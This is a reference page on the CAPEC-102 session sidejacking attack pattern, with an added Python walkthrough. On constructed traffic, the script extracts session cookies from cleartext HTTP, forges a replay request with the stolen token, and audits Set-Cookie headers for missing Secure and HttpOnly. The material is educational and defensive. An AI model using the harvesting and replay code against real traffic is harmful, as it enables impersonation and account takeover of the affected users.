CAPEC-102: Session Sidejacking

Description
Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.

Severity: High

Likelihood of attack: High

Abstraction: Detailed

Relationships with other CAPECs

This table shows the other attack patterns and high level categories that are related to this attack pattern.

Prerequisites


  • The attacker and the victim are both using the same WiFi network, or the attacker is otherwise positioned to observe the victim's traffic.
  • The victim has an active session with the target system.
  • The victim is not using an encrypted channel to communicate with the target system (for example TLS or a VPN).
  • The victim's traffic to the target system carries the session token, either because the victim initiated a request that transfers it or because the target application uses AJAX and periodically "rings home" asynchronously with the session token.
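As an added illustration that is not part of the CAPEC entry, the following Python script works through both the description and the prerequisites above: it harvests a session cookie from constructed plaintext HTTP messages (as an attacker sniffing the victim's segment would see them), builds the request the attacker would replay to impersonate the victim, and audits the server's Set-Cookie header for the attributes that keep the token off a cleartext channel. The host name, cookie value and the list of session cookie names are assumptions made up for this example.

```python
"""Session sidejacking walkthrough: harvest a session token from cleartext HTTP,
forge the replay request, and audit the server's Set-Cookie for weak attributes."""

# Constructed sample traffic (not a real capture): plaintext HTTP/1.1 messages as
# they would appear to anyone sniffing the victim's network segment.
CAPTURED_HTTP = [
    b"GET /login HTTP/1.1\r\nHost: app.example\r\n\r\n",
    b"HTTP/1.1 200 OK\r\nSet-Cookie: JSESSIONID=5E2A9C1F7D; Path=/\r\n"
    b"Content-Length: 0\r\n\r\n",
    b"GET /account HTTP/1.1\r\nHost: app.example\r\n"
    b"Cookie: JSESSIONID=5E2A9C1F7D; theme=dark\r\n\r\n",
    # AJAX poll: the token is resent on every background request, so the
    # attacker does not need to be listening when the victim logs in.
    b"POST /api/poll HTTP/1.1\r\nHost: app.example\r\n"
    b"Cookie: JSESSIONID=5E2A9C1F7D\r\nContent-Length: 2\r\n\r\n{}",
]

# Constructed hardened response for comparison (assumed, not from a real server).
HARDENED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: JSESSIONID=5E2A9C1F7D; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    b"Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    b"Content-Length: 0\r\n\r\n"
)

# Assumed list of cookie names that frameworks commonly use for the session id.
SESSION_COOKIE_NAMES = {"JSESSIONID", "PHPSESSID", "ASP.NET_SessionId",
                        "session", "sessionid", "sid"}


def parse_message(raw):
    """Split a raw HTTP message into (start_line, [(name, value), ...]).
    Headers come back as a list because Set-Cookie may legitimately repeat."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def extract_session_tokens(messages):
    """Attacker side: harvest session cookies from request Cookie headers.
    Returns {(host, cookie_name): token}."""
    found = {}
    for raw in messages:
        start, headers = parse_message(raw)
        if start.startswith("HTTP/"):
            continue  # a response; Set-Cookie is handled by the audit below
        host = next((v for n, v in headers if n == "host"), "?")
        for name, value in headers:
            if name != "cookie":
                continue
            for pair in value.split(";"):
                cname, _, cval = pair.strip().partition("=")
                if cname in SESSION_COOKIE_NAMES:
                    found[(host, cname)] = cval
    return found


def build_replay_request(host, path, cookie_name, token):
    """Attacker side: a request presenting the stolen token. To the server it is
    indistinguishable from the victim's own browser."""
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_name}={token}\r\nConnection: close\r\n\r\n").encode()


def audit_set_cookie(messages):
    """Defender side: report session cookies issued without Secure (never sent
    over plain HTTP) or HttpOnly (not readable by script)."""
    required = {"secure": "Secure", "httponly": "HttpOnly"}
    findings = []
    for raw in messages:
        start, headers = parse_message(raw)
        if not start.startswith("HTTP/"):
            continue
        for name, value in headers:
            if name != "set-cookie":
                continue
            parts = [p.strip() for p in value.split(";")]
            cname = parts[0].partition("=")[0]
            if cname not in SESSION_COOKIE_NAMES:
                continue
            attrs = {p.partition("=")[0].lower() for p in parts[1:]}
            for attr, label in required.items():
                if attr not in attrs:
                    findings.append(f"{cname}: missing {label} attribute")
    return findings


if __name__ == "__main__":
    for (host, cname), token in extract_session_tokens(CAPTURED_HTTP).items():
        print(f"harvested {cname}={token} for {host}")
        print(build_replay_request(host, "/account", cname, token).decode())
    for finding in audit_set_cookie(CAPTURED_HTTP):
        print("finding:", finding)
    print("hardened response findings:", audit_set_cookie([HARDENED_RESPONSE]))
```

The Secure attribute only stops a browser from attaching the cookie to plain-HTTP requests; it does nothing for an application that is itself served over HTTP, so the countermeasure that actually removes the precondition is serving the whole application over TLS and enabling HSTS, with the cookie attributes as defence in depth.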
Skills required


  • Low: easy-to-use tools exist to automate this attack.
Taxonomy mappings

Mappings to ATT&CK, OWASP and other frameworks.

Resources required

A packet sniffing tool, such as Wireshark, can be used to capture session information.

Visit http://capec.mitre.org/ for more details.